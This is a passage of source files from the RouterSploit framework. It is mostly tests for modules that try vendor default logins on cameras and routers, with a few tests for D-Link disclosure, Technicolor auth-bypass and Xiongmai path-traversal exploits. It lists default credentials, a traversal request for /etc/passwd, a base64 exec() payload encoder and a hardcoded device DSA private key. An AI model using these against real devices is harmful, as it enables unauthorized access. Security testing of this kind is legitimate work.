assert exploit.threads == 1 11 | assert exploit.defaults == ["admin:meinsm"] 12 | assert exploit.stop_on_success is True 13 | assert exploit.verbosity is True 14 | 15 | exploit.target = generic_target.host 16 | exploit.port = generic_target.port 17 | 18 | assert exploit.check() is False 19 | assert exploit.check_default() is None 20 | assert exploit.run() is None 21 | -------------------------------------------------------------------------------- /tests/creds/cameras/siemens/test_ftp_default_creds.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.creds.cameras.siemens.ftp_default_creds import Exploit 2 | 3 | 4 | def test_check_success(generic_target): 5 | """ Test scenario - testing against FTP server """ 6 | 7 | exploit = Exploit() 8 | assert exploit.target == "" 9 | assert exploit.port == 21 10 | assert exploit.threads == 1 11 | assert exploit.defaults == ["admin:admin"] 12 | assert exploit.stop_on_success is True 13 | assert exploit.verbosity is True 14 | 15 | exploit.target = generic_target.host 16 | exploit.port = generic_target.port 17 | 18 | assert exploit.check() is False 19 | assert exploit.check_default() is None 20 | assert exploit.run() is None 21 | -------------------------------------------------------------------------------- /tests/creds/cameras/stardot/test_ftp_default_creds.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.creds.cameras.stardot.ftp_default_creds import Exploit 2 | 3 | 4 | def test_check_success(generic_target): 5 | """ Test scenario - testing against FTP server """ 6 | 7 | exploit = Exploit() 8 | assert exploit.target == "" 9 | assert exploit.port == 21 10 | assert exploit.threads == 1 11 | assert exploit.defaults == ["admin:admin"] 12 | assert exploit.stop_on_success is True 13 | assert exploit.verbosity is True 14 | 15 | exploit.target = generic_target.host 16 | exploit.port = generic_target.port 17 | 18 | assert exploit.check() is False 19 | assert exploit.check_default() is None 20 | assert exploit.run() is None 21 | -------------------------------------------------------------------------------- /tests/creds/cameras/vacron/test_ftp_default_creds.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.creds.cameras.vacron.ftp_default_creds import Exploit 2 | 3 | 4 | def test_check_success(generic_target): 5 | """ Test scenario - testing against FTP server """ 6 | 7 | exploit = Exploit() 8 | assert exploit.target == "" 9 | assert exploit.port == 21 10 | assert exploit.threads == 1 11 | assert exploit.defaults == ["admin:admin"] 12 | assert exploit.stop_on_success is True 13 | assert exploit.verbosity is True 14 | 15 | exploit.target = generic_target.host 16 | exploit.port = generic_target.port 17 | 18 | assert exploit.check() is False 19 | assert exploit.check_default() is None 20 | assert exploit.run() is None 21 | -------------------------------------------------------------------------------- /tests/creds/routers/bhu/test_ftp_default_creds.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.creds.routers.bhu.ftp_default_creds import Exploit 2 | 3 | 4 | def test_check_success(generic_target): 5 | """ Test scenario - testing against FTP server """ 6 | 7 | exploit = Exploit() 8 | 9 | assert exploit.target == "" 10 | assert exploit.port == 21 11 | assert exploit.threads == 1 12 | assert exploit.defaults == ["admin:admin"] 13 | assert exploit.stop_on_success is True 14 | assert exploit.verbosity is True 15 | 16 | exploit.target = generic_target.host 17 | exploit.port = generic_target.port 18 | 19 | assert exploit.check() is False 20 | assert exploit.check_default() is None 21 | assert exploit.run() is None 22 | -------------------------------------------------------------------------------- /tests/creds/routers/bhu/test_ssh_default_creds.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.creds.routers.bhu.ssh_default_creds import Exploit 2 | 3 | 4 | def test_check_success(generic_target): 5 | """ Test scenario - testing against SSH server """ 6 | 7 | exploit = Exploit() 8 | 9 | assert exploit.target == "" 10 | assert exploit.port == 22 11 | assert exploit.threads == 1 12 | assert exploit.defaults == ["admin:admin"] 13 | assert exploit.stop_on_success is True 14 | assert exploit.verbosity is True 15 | 16 | exploit.target = generic_target.host 17 | exploit.port = generic_target.port 18 | 19 | assert exploit.check() is False 20 | assert exploit.check_default() is None 21 | assert exploit.run() is None 22 | -------------------------------------------------------------------------------- /tests/exploits/routers/dlink/test_dsl_2750b_info_disclosure.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.exploits.routers.dlink.dsl_2750b_info_disclosure import Exploit 2 | 3 | 4 | def test_check_success(target): 5 | """ Test scenario - successful exploitation """ 6 | 7 | cgi_mock = target.get_route_mock("/hidden_info.html", methods=["GET"]) 8 | cgi_mock.return_value = ( 9 | "TEST" 10 | "PassPhrase" 11 | "TEST" 12 | "SSID" 13 | "TEST" 14 | ) 15 | 16 | exploit = Exploit() 17 | 18 | assert exploit.target == "" 19 | assert exploit.port == 80 20 | 21 | exploit.target = target.host 22 | exploit.port = target.port 23 | 24 | assert exploit.check() 25 | assert exploit.run() is None 26 | -------------------------------------------------------------------------------- /tests/exploits/routers/dlink/test_dwl_3200ap_password_disclosure.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.exploits.routers.dlink.dwl_3200ap_password_disclosure import Exploit 2 | 3 | 4 | def test_check_success(target): 5 | """ Test scenario - successful check """ 6 | 7 | route_mock = target.get_route_mock("/", methods=["GET"]) 8 | route_mock.return_value = ( 9 | "TEST" 10 | "RpWebID=a3b21ada\n" 11 | "TEST" 12 | ) 13 | 14 | exploit = Exploit() 15 | 16 | assert exploit.target == "" 17 | assert exploit.port == 80 18 | assert exploit.seconds == 3600 19 | 20 | exploit.target = target.host 21 | exploit.port = target.port 22 | 23 | assert exploit.check() 24 | assert exploit.run() is None 25 | -------------------------------------------------------------------------------- /tests/creds/cameras/brickcom/test_ftp_default_creds.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.creds.cameras.brickcom.ftp_default_creds import Exploit 2 | 3 | 4 | def test_check_success(generic_target): 5 | """ Test scenario - testing against FTP server """ 6 | 7 | exploit = Exploit() 8 | assert exploit.target == "" 9 | assert exploit.port == 21 10 | assert exploit.threads == 1 11 | assert exploit.defaults == ["admin:admin"] 12 | assert exploit.stop_on_success is True 13 | assert exploit.verbosity is True 14 | 15 | exploit.target = generic_target.host 16 | exploit.port = generic_target.port 17 | 18 | assert exploit.check() is False 19 | assert exploit.check_default() is None 20 | assert exploit.run() is None 21 | -------------------------------------------------------------------------------- /tests/creds/cameras/geovision/test_ftp_default_creds.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.creds.cameras.geovision.ftp_default_creds import Exploit 2 | 3 | 4 | def test_check_success(generic_target): 5 | """ Test scenario - testing against FTP server """ 6 | 7 | exploit = Exploit() 8 | assert exploit.target == "" 9 | assert exploit.port == 21 10 | assert exploit.threads == 1 11 | assert exploit.defaults == ["admin:admin"] 12 | assert exploit.stop_on_success is True 13 | assert exploit.verbosity is True 14 | 15 | exploit.target = generic_target.host 16 | exploit.port = generic_target.port 17 | 18 | assert exploit.check() is False 19 | assert exploit.check_default() is None 20 | assert exploit.run() is None 21 | -------------------------------------------------------------------------------- /tests/creds/cameras/hikvision/test_ftp_default_creds.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.creds.cameras.hikvision.ftp_default_creds import Exploit 2 | 3 | 4 | def test_check_success(generic_target): 5 | """ Test scenario - testing against FTP server """ 6 | 7 | exploit = Exploit() 8 | assert exploit.target == "" 9 | assert exploit.port == 21 10 | assert exploit.threads == 1 11 | assert exploit.defaults == ["admin:12345"] 12 | assert exploit.stop_on_success is True 13 | assert exploit.verbosity is True 14 | 15 | exploit.target = generic_target.host 16 | exploit.port = generic_target.port 17 | 18 | assert exploit.check() is False 19 | assert exploit.check_default() is None 20 | assert exploit.run() is None 21 | -------------------------------------------------------------------------------- /tests/creds/cameras/honeywell/test_ftp_default_creds.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.creds.cameras.honeywell.ftp_default_creds import Exploit 2 | 3 | 4 | def test_check_success(generic_target): 5 | """ Test scenario - testing against FTP server """ 6 | 7 | exploit = Exploit() 8 | assert exploit.target == "" 9 | assert exploit.port == 21 10 | assert exploit.threads == 1 11 | assert exploit.defaults == ["admin:1234"] 12 | assert exploit.stop_on_success is True 13 | assert exploit.verbosity is True 14 | 15 | exploit.target = generic_target.host 16 | exploit.port = generic_target.port 17 | 18 | assert exploit.check() is False 19 | assert exploit.check_default() is None 20 | assert exploit.run() is None 21 | -------------------------------------------------------------------------------- /tests/creds/cameras/iqinvision/test_ftp_default_creds.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.creds.cameras.iqinvision.ftp_default_creds import Exploit 2 | 3 | 4 | def test_check_success(generic_target): 5 | """ Test scenario - testing against FTP server """ 6 | 7 | exploit = Exploit() 8 | assert exploit.target == "" 9 | assert exploit.port == 21 10 | assert exploit.threads == 1 11 | assert exploit.defaults == ["root:system"] 12 | assert exploit.stop_on_success is True 13 | assert exploit.verbosity is True 14 | 15 | exploit.target = generic_target.host 16 | exploit.port = generic_target.port 17 | 18 | assert exploit.check() is False 19 | assert exploit.check_default() is None 20 | assert exploit.run() is None 21 | -------------------------------------------------------------------------------- /tests/creds/cameras/jvc/test_telnet_default_creds.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.creds.cameras.jvc.telnet_default_creds import Exploit 2 | 3 | 4 | def test_check_success(generic_target): 5 | """ Test scenario - testing against Telnet server """ 6 | 7 | exploit = Exploit() 8 | assert exploit.target == "" 9 | assert exploit.port == 23 10 | assert exploit.threads == 1 11 | assert exploit.defaults == ["admin:jvc"] 12 | assert exploit.stop_on_success is True 13 | assert exploit.verbosity is True 14 | 15 | exploit.target = generic_target.host 16 | exploit.port = generic_target.port 17 | 18 | assert exploit.check() is True 19 | assert exploit.check_default() is not None 20 | assert exploit.run() is None 21 | -------------------------------------------------------------------------------- /tests/creds/cameras/samsung/test_ssh_default_creds.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.creds.cameras.samsung.ssh_default_creds import Exploit 2 | 3 | 4 | def test_check_success(target): 5 | """ Test scenario - testing against SSH server """ 6 | 7 | exploit = Exploit() 8 | assert exploit.target == "" 9 | assert exploit.port == 22 10 | assert exploit.threads == 1 11 | assert exploit.defaults == ["admin:1111111", "admin:4321", "root:admin"] 12 | assert exploit.stop_on_success is True 13 | assert exploit.verbosity is True 14 | 15 | exploit.target = target.host 16 | exploit.port = target.port 17 | 18 | assert exploit.check() is False 19 | assert exploit.check_default() is None 20 | assert exploit.run() is None 21 | -------------------------------------------------------------------------------- /tests/creds/cameras/sentry360/test_ftp_default_creds.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.creds.cameras.sentry360.ftp_default_creds import Exploit 2 | 3 | 4 | def test_check_success(generic_target): 5 | """ Test scenario - testing against FTP server """ 6 | 7 | exploit = Exploit() 8 | assert exploit.target == "" 9 | assert exploit.port == 21 10 | assert exploit.threads == 1 11 | assert exploit.defaults == ["admin:1234"] 12 | assert exploit.stop_on_success is True 13 | assert exploit.verbosity is True 14 | 15 | exploit.target = generic_target.host 16 | exploit.port = generic_target.port 17 | 18 | assert exploit.check() is False 19 | assert exploit.check_default() is None 20 | assert exploit.run() is None 21 | -------------------------------------------------------------------------------- /tests/creds/routers/billion/test_ftp_default_creds.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.creds.routers.billion.ftp_default_creds import Exploit 2 | 3 | 4 | def test_check_success(generic_target): 5 | """ Test scenario - testing against FTP server """ 6 | 7 | exploit = Exploit() 8 | 9 | assert exploit.target == "" 10 | assert exploit.port == 21 11 | assert exploit.threads == 1 12 | assert exploit.defaults == ["admin:admin"] 13 | assert exploit.stop_on_success is True 14 | assert exploit.verbosity is True 15 | 16 | exploit.target = generic_target.host 17 | exploit.port = generic_target.port 18 | 19 | assert exploit.check() is False 20 | assert exploit.check_default() is None 21 | assert exploit.run() is None 22 | -------------------------------------------------------------------------------- /tests/creds/routers/billion/test_ssh_default_creds.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.creds.routers.billion.ssh_default_creds import Exploit 2 | 3 | 4 | def test_check_success(generic_target): 5 | """ Test scenario - testing against SSH server """ 6 | 7 | exploit = Exploit() 8 | 9 | assert exploit.target == "" 10 | assert exploit.port == 22 11 | assert exploit.threads == 1 12 | assert exploit.defaults == ["admin:admin"] 13 | assert exploit.stop_on_success is True 14 | assert exploit.verbosity is True 15 | 16 | exploit.target = generic_target.host 17 | exploit.port = generic_target.port 18 | 19 | assert exploit.check() is False 20 | assert exploit.check_default() is None 21 | assert exploit.run() is None 22 | -------------------------------------------------------------------------------- /tests/creds/routers/cisco/test_ftp_default_creds.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.creds.routers.cisco.ftp_default_creds import Exploit 2 | 3 | 4 | def test_check_success(generic_target): 5 | """ Test scenario - testing against FTP server """ 6 | 7 | exploit = Exploit() 8 | 9 | assert exploit.target == "" 10 | assert exploit.port == 21 11 | assert exploit.threads == 1 12 | assert exploit.defaults == ["admin:admin"] 13 | assert exploit.stop_on_success is True 14 | assert exploit.verbosity is True 15 | 16 | exploit.target = generic_target.host 17 | exploit.port = generic_target.port 18 | 19 | assert exploit.check() is False 20 | assert exploit.check_default() is None 21 | assert exploit.run() is None 22 | -------------------------------------------------------------------------------- /tests/creds/routers/cisco/test_ssh_default_creds.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.creds.routers.cisco.ssh_default_creds import Exploit 2 | 3 | 4 | def test_check_success(generic_target): 5 | """ Test scenario - testing against SSH server """ 6 | 7 | exploit = Exploit() 8 | 9 | assert exploit.target == "" 10 | assert exploit.port == 22 11 | assert exploit.threads == 1 12 | assert exploit.defaults == ["admin:admin"] 13 | assert exploit.stop_on_success is True 14 | assert exploit.verbosity is True 15 | 16 | exploit.target = generic_target.host 17 | exploit.port = generic_target.port 18 | 19 | assert exploit.check() is False 20 | assert exploit.check_default() is None 21 | assert exploit.run() is None 22 | -------------------------------------------------------------------------------- /tests/creds/routers/netsys/test_ftp_default_creds.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.creds.routers.netsys.ftp_default_creds import Exploit 2 | 3 | 4 | def test_check_success(generic_target): 5 | """ Test scenario - testing against FTP server """ 6 | 7 | exploit = Exploit() 8 | 9 | assert exploit.target == "" 10 | assert exploit.port == 21 11 | assert exploit.threads == 1 12 | assert exploit.defaults == ["admin:admin"] 13 | assert exploit.stop_on_success is True 14 | assert exploit.verbosity is True 15 | 16 | exploit.target = generic_target.host 17 | exploit.port = generic_target.port 18 | 19 | assert exploit.check() is False 20 | assert exploit.check_default() is None 21 | assert exploit.run() is None 22 | -------------------------------------------------------------------------------- /tests/creds/routers/netsys/test_ssh_default_creds.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.creds.routers.netsys.ssh_default_creds import Exploit 2 | 3 | 4 | def test_check_success(generic_target): 5 | """ Test scenario - testing against SSH server """ 6 | 7 | exploit = Exploit() 8 | 9 | assert exploit.target == "" 10 | assert exploit.port == 22 11 | assert exploit.threads == 1 12 | assert exploit.defaults == ["admin:admin"] 13 | assert exploit.stop_on_success is True 14 | assert exploit.verbosity is True 15 | 16 | exploit.target = generic_target.host 17 | exploit.port = generic_target.port 18 | 19 | assert exploit.check() is False 20 | assert exploit.check_default() is None 21 | assert exploit.run() is None 22 | -------------------------------------------------------------------------------- /tests/creds/routers/tplink/test_ftp_default_creds.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.creds.routers.tplink.ftp_default_creds import Exploit 2 | 3 | 4 | def test_check_success(generic_target): 5 | """ Test scenario - testing against FTP server """ 6 | 7 | exploit = Exploit() 8 | 9 | assert exploit.target == "" 10 | assert exploit.port == 21 11 | assert exploit.threads == 1 12 | assert exploit.defaults == ["admin:admin"] 13 | assert exploit.stop_on_success is True 14 | assert exploit.verbosity is True 15 | 16 | exploit.target = generic_target.host 17 | exploit.port = generic_target.port 18 | 19 | assert exploit.check() is False 20 | assert exploit.check_default() is None 21 | assert exploit.run() is None 22 | -------------------------------------------------------------------------------- /tests/creds/routers/tplink/test_ssh_default_creds.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.creds.routers.tplink.ssh_default_creds import Exploit 2 | 3 | 4 | def test_check_success(generic_target): 5 | """ Test scenario - testing against SSH server """ 6 | 7 | exploit = Exploit() 8 | 9 | assert exploit.target == "" 10 | assert exploit.port == 22 11 | assert exploit.threads == 1 12 | assert exploit.defaults == ["admin:admin"] 13 | assert exploit.stop_on_success is True 14 | assert exploit.verbosity is True 15 | 16 | exploit.target = generic_target.host 17 | exploit.port = generic_target.port 18 | 19 | assert exploit.check() is False 20 | assert exploit.check_default() is None 21 | assert exploit.run() is None 22 | -------------------------------------------------------------------------------- /tests/exploits/cameras/xiongmai/test_uc_httpd_path_traversal.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.exploits.cameras.xiongmai.uc_httpd_path_traversal import Exploit 2 | 3 | 4 | def test_check_success(target): 5 | """ Test scenario - successful check """ 6 | 7 | route_mock = target.get_route_mock("/../../../../../etc/passwd", methods=["GET"]) 8 | route_mock.return_value = ( 9 | "root:absxcfbgXtb3o:0:0:root:/:/bin/sh" 10 | ) 11 | 12 | exploit = Exploit() 13 | 14 | assert exploit.target == "" 15 | assert exploit.port == 80 16 | assert exploit.filename == "/etc/passwd" 17 | 18 | exploit.target = target.host 19 | exploit.port = target.port 20 | 21 | assert exploit.check() 22 | assert exploit.run() is None 23 | -------------------------------------------------------------------------------- /tests/exploits/routers/technicolor/test_dwg855_authbypass.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.exploits.routers.technicolor.dwg855_authbypass import Exploit 2 | 3 | 4 | def test_check_success(target): 5 | """ Test scenario - successful check """ 6 | 7 | route_mock = target.get_route_mock("/logo.jpg", methods=["GET"]) 8 | route_mock.return_value = ( 9 | b"\x11\x44\x75\x63\x6b\x79\x00" 10 | ) 11 | 12 | exploit = Exploit() 13 | 14 | assert exploit.target == "" 15 | assert exploit.port == 80 16 | assert exploit.nuser == "ruser" 17 | assert exploit.npass == "rpass" 18 | 19 | exploit.target = target.host 20 | exploit.port = target.port 21 | 22 | assert exploit.check() 23 | assert exploit.run() is None 24 | -------------------------------------------------------------------------------- /routersploit/core/exploit/encoders.py: -------------------------------------------------------------------------------- 1 | from routersploit.core.exploit.exploit import ( 2 | BaseExploit, 3 | ) 4 | from routersploit.core.exploit.printer import ( 5 | print_error, 6 | ) 7 | 8 | 9 | class BaseEncoder(BaseExploit): 10 | architecture = None 11 | 12 | def __init__(self): 13 | self.module_name = self.__module__.replace("routersploit.modules.encoders.", "").replace(".", "/") 14 | 15 | def encode(self): 16 | raise NotImplementedError("Please implement 'encode()' method") 17 | 18 | def run(self): 19 | print_error("Module cannot be run") 20 | 21 | def __str__(self): 22 | return self.module_name 23 | 24 | def __format__(self, form): 25 | return format(self.module_name, form) 26 | -------------------------------------------------------------------------------- /routersploit/modules/encoders/python/base64.py: -------------------------------------------------------------------------------- 1 | from base64 import b64encode 2 | from routersploit.core.exploit.encoders import BaseEncoder 3 | from routersploit.core.exploit.payloads import Architectures 4 | 5 | 6 | class Encoder(BaseEncoder): 7 | __info__ = { 8 | "name": "Python Base64 Encoder", 9 | "description": "Module encodes Python payload to Base64 format.", 10 | "authors": ( 11 | "Marcin Bury ", # routersploit module 12 | ), 13 | } 14 | 15 | architecture = Architectures.PYTHON 16 | 17 | def encode(self, payload): 18 | encoded_payload = str(b64encode(bytes(payload, "utf-8")), "utf-8") 19 | return "exec('{}'.decode('base64'))".format(encoded_payload) 20 | -------------------------------------------------------------------------------- /routersploit/resources/ssh_keys/quantum-dxi-v1000.key: -------------------------------------------------------------------------------- 1 | -----BEGIN DSA PRIVATE KEY----- 2 | MIIBugIBAAKBgQCEgBNwgF+IbMU8NHUXNIMfJ0ONa91ZI/TphuixnilkZqcuwur2 3 | hMbrqY8Yne+n3eGkuepQlBBKEZSd8xPd6qCvWnCOhBqhkBS7g2dH6jMkUl/opX/t 4 | Rw6P00crq2oIMafR4/SzKWVW6RQEzJtPnfV7O3i5miY7jLKMDZTn/DRXRwIVALB2 5 | +o4CRHpCG6IBqlD/2JW5HRQBAoGAaSzKOHYUnlpAoX7+ufViz37cUa1/x0fGDA/4 6 | 6mt0eD7FTNoOnUNdfdZx7oLXVe7mjHjqjif0EVnmDPlGME9GYMdi6r4FUozQ33Y5 7 | PmUWPMd0phMRYutpihaExkjgl33AH7mp42qBfrHqZ2oi1HfkqCUoRmB6KkdkFosr 8 | E0apJ5cCgYBLEgYmr9XCSqjENFDVQPFELYKT7Zs9J87PjPS1AP0qF1OoRGZ5mefK 9 | 6X/6VivPAUWmmmev/BuAs8M1HtfGeGGzMzDIiU/WZQ3bScLB1Ykrcjk7TOFD6xrn 10 | k/inYAp5l29hjidoAONcXoHmUAMYOKqn63Q2AsDpExVcmfj99/BlpQIUYS6Hs70u 11 | B3Upsx556K/iZPPnJZE= 12 | -----END DSA PRIVATE KEY----- 13 | -------------------------------------------------------------------------------- /tests/creds/cameras/american_dynamics/test_ssh_default_creds.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.creds.cameras.american_dynamics.ssh_default_creds import Exploit 2 | 3 | 4 | def test_check_success(target): 5 | """ Test scenario - testing against SSH server """ 6 | 7 | exploit = Exploit() 8 | assert exploit.target == "" 9 | assert exploit.port == 22 10 | assert exploit.threads == 1 11 | assert exploit.defaults == ["admin:admin", "admin:9999"] 12 | assert exploit.stop_on_success is True 13 | assert exploit.verbosity is True 14 | 15 | exploit.target = target.host 16 | exploit.port = target.port 17 | 18 | assert exploit.check() is False 19 | assert exploit.check_default() is None 20 | assert exploit.run() is None 21 | -------------------------------------------------------------------------------- /tests/creds/cameras/avtech/test_telnet_default_creds.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.creds.cameras.avtech.telnet_default_creds import Exploit 2 | 3 | 4 | def test_check_success(generic_target): 5 | """ Test scenario - testing against Telnet server """ 6 | 7 | exploit = Exploit() 8 | assert exploit.target == "" 9 | assert exploit.port == 23 10 | assert exploit.threads == 1 11 | assert exploit.defaults == ["admin:admin"] 12 | assert exploit.stop_on_success is True 13 | assert exploit.verbosity is True 14 | 15 | exploit.target = generic_target.host 16 | exploit.port = generic_target.port 17 | 18 | assert exploit.check() is True 19 | assert exploit.check_default() is not None 20 | assert exploit.run() is None 21 | -------------------------------------------------------------------------------- /tests/creds/cameras/axis/test_ftp_default_creds.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.creds.cameras.axis.ftp_default_creds import Exploit 2 | 3 | 4 | def test_check_success(generic_target): 5 | """ Test scenario - testing against FTP server """ 6 | 7 | exploit = Exploit() 8 | assert exploit.target == "" 9 | assert exploit.port == 21 10 | assert exploit.threads == 1 11 | assert exploit.defaults == ["root:pass", "admin:admin"] 12 | assert exploit.stop_on_success is True 13 | assert exploit.verbosity is True 14 | 15 | exploit.target = generic_target.host 16 | exploit.port = generic_target.port 17 | 18 | assert exploit.check() is False 19 | assert exploit.check_default() is None 20 | assert exploit.run() is None 21 | -------------------------------------------------------------------------------- /tests/creds/cameras/basler/test_telnet_default_creds.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.creds.cameras.basler.telnet_default_creds import Exploit 2 | 3 | 4 | def test_check_success(generic_target): 5 | """ Test scenario - testing against Telnet server """ 6 | 7 | exploit = Exploit() 8 | assert exploit.target == "" 9 | assert exploit.port == 23 10 | assert exploit.threads == 1 11 | assert exploit.defaults == ["admin:admin"] 12 | assert exploit.stop_on_success is True 13 | assert exploit.verbosity is True 14 | 15 | exploit.target = generic_target.host 16 | exploit.port = generic_target.port 17 | 18 | assert exploit.check() is True 19 | assert exploit.check_default() is not None 20 | assert exploit.run() is None 21 | -------------------------------------------------------------------------------- /tests/creds/cameras/canon/test_telnet_default_creds.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.creds.cameras.canon.telnet_default_creds import Exploit 2 | 3 | 4 | def test_check_success(generic_target): 5 | """ Test scenario - testing against Telnet server """ 6 | 7 | exploit = Exploit() 8 | assert exploit.target == "" 9 | assert exploit.port == 23 10 | assert exploit.threads == 1 11 | assert exploit.defaults == ["root:camera"] 12 | assert exploit.stop_on_success is True 13 | assert exploit.verbosity is True 14 | 15 | exploit.target = generic_target.host 16 | exploit.port = generic_target.port 17 | 18 | assert exploit.check() is True 19 | assert exploit.check_default() is not None 20 | assert exploit.run() is None 21 | -------------------------------------------------------------------------------- /tests/creds/cameras/cisco/test_telnet_default_creds.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.creds.cameras.cisco.telnet_default_creds import Exploit 2 | 3 | 4 | def test_check_success(generic_target): 5 | """ Test scenario - testing against Telnet server """ 6 | 7 | exploit = Exploit() 8 | assert exploit.target == "" 9 | assert exploit.port == 23 10 | assert exploit.threads == 1 11 | assert exploit.defaults == ["admin:admin"] 12 | assert exploit.stop_on_success is True 13 | assert exploit.verbosity is True 14 | 15 | exploit.target = generic_target.host 16 | exploit.port = generic_target.port 17 | 18 | assert exploit.check() is True 19 | assert exploit.check_default() is not None 20 | assert exploit.run() is None 21 | -------------------------------------------------------------------------------- /tests/creds/cameras/dlink/test_telnet_default_creds.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.creds.cameras.dlink.telnet_default_creds import Exploit 2 | 3 | 4 | def test_check_success(generic_target): 5 | """ Test scenario - testing against Telnet server """ 6 | 7 | exploit = Exploit() 8 | assert exploit.target == "" 9 | assert exploit.port == 23 10 | assert exploit.threads == 1 11 | assert exploit.defaults == ["admin:admin"] 12 | assert exploit.stop_on_success is True 13 | assert exploit.verbosity is True 14 | 15 | exploit.target = generic_target.host 16 | exploit.port = generic_target.port 17 | 18 | assert exploit.check() is True 19 | assert exploit.check_default() is not None 20 | assert exploit.run() is None 21 | -------------------------------------------------------------------------------- /tests/creds/cameras/grandstream/test_ftp_default_creds.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.creds.cameras.grandstream.ftp_default_creds import Exploit 2 | 3 | 4 | def test_check_success(generic_target): 5 | """ Test scenario - testing against FTP server """ 6 | 7 | exploit = Exploit() 8 | assert exploit.target == "" 9 | assert exploit.port == 21 10 | assert exploit.threads == 1 11 | assert exploit.defaults == ["admin:admin"] 12 | assert exploit.stop_on_success is True 13 | assert exploit.verbosity is True 14 | 15 | exploit.target = generic_target.host 16 | exploit.port = generic_target.port 17 | 18 | assert exploit.check() is False 19 | assert exploit.check_default() is None 20 | assert exploit.run() is None 21 | -------------------------------------------------------------------------------- /tests/creds/cameras/speco/test_telnet_default_creds.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.creds.cameras.speco.telnet_default_creds import Exploit 2 | 3 | 4 | def test_check_success(generic_target): 5 | """ Test scenario - testing against Telnet server """ 6 | 7 | exploit = Exploit() 8 | assert exploit.target == "" 9 | assert exploit.port == 23 10 | assert exploit.threads == 1 11 | assert exploit.defaults == ["admin:1234"] 12 | assert exploit.stop_on_success is True 13 | assert exploit.verbosity is True 14 | 15 | exploit.target = generic_target.host 16 | exploit.port = generic_target.port 17 | 18 | assert exploit.check() is True 19 | assert exploit.check_default() is not None 20 | assert exploit.run() is None 21 | -------------------------------------------------------------------------------- /tests/creds/cameras/vacron/test_telnet_default_creds.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.creds.cameras.vacron.telnet_default_creds import Exploit 2 | 3 | 4 | def test_check_success(generic_target): 5 | """ Test scenario - testing against Telnet server """ 6 | 7 | exploit = Exploit() 8 | assert exploit.target == "" 9 | assert exploit.port == 23 10 | assert exploit.threads == 1 11 | assert exploit.defaults == ["admin:admin"] 12 | assert exploit.stop_on_success is True 13 | assert exploit.verbosity is True 14 | 15 | exploit.target = generic_target.host 16 | exploit.port = generic_target.port 17 | 18 | assert exploit.check() is True 19 | assert exploit.check_default() is not None 20 | assert exploit.run() is None 21 | -------------------------------------------------------------------------------- /tests/creds/cameras/videoiq/test_ftp_default_creds.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.creds.cameras.videoiq.ftp_default_creds import Exploit 2 | 3 | 4 | def test_check_success(generic_target): 5 | """ Test scenario - testing against FTP server """ 6 | 7 | exploit = Exploit() 8 | assert exploit.target == "" 9 | assert exploit.port == 21 10 | assert exploit.threads == 1 11 | assert exploit.defaults == ["supervisor:supervisor"] 12 | assert exploit.stop_on_success is True 13 | assert exploit.verbosity is True 14 | 15 | exploit.target = generic_target.host 16 | exploit.port = generic_target.port 17 | 18 | assert exploit.check() is False 19 | assert exploit.check_default() is None 20 | assert exploit.run() is None 21 | -------------------------------------------------------------------------------- /tests/creds/routers/asmax/test_ssh_default_creds.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.creds.routers.asmax.ssh_default_creds import Exploit 2 | 3 | 4 | def test_check_success(target): 5 | """ Test scenario - testing against SSH server """ 6 | 7 | exploit = Exploit() 8 | 9 | assert exploit.target == "" 10 | assert exploit.port == 22 11 | assert exploit.threads == 1 12 | assert exploit.defaults == ["admin:admin", "support:support", "user:user"] 13 | assert exploit.stop_on_success is True 14 | assert exploit.verbosity is True 15 | 16 | exploit.target = target.host 17 | exploit.port = target.port 18 | 19 | assert exploit.check() is False 20 | assert exploit.check_default() is None 21 | assert exploit.run() is None 22 | -------------------------------------------------------------------------------- /tests/creds/routers/bhu/test_telnet_default_creds.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.creds.routers.bhu.telnet_default_creds import Exploit 2 | 3 | 4 | def test_check_success(generic_target): 5 | """ Test scenario - testing against Telnet server """ 6 | 7 | exploit = Exploit() 8 | 9 | assert exploit.target == "" 10 | assert exploit.port == 23 11 | assert exploit.threads == 1 12 | assert exploit.defaults == ["admin:admin"] 13 | assert exploit.stop_on_success is True 14 | assert exploit.verbosity is True 15 | 16 | exploit.target = generic_target.host 17 | exploit.port = generic_target.port 18 | 19 | assert exploit.check() is True 20 | assert exploit.check_default() is not None 21 | assert exploit.run() is None 22 | -------------------------------------------------------------------------------- /tests/creds/routers/comtrend/test_ftp_default_creds.py: -------------------------------------------------------------------------------- 1 | from routersploit.modules.creds.routers.comtrend.ftp_default_creds import Exploit 2 | 3 | 4 | def test_check_success(generic_target): 5 | """ Test scenario - testing against FTP server 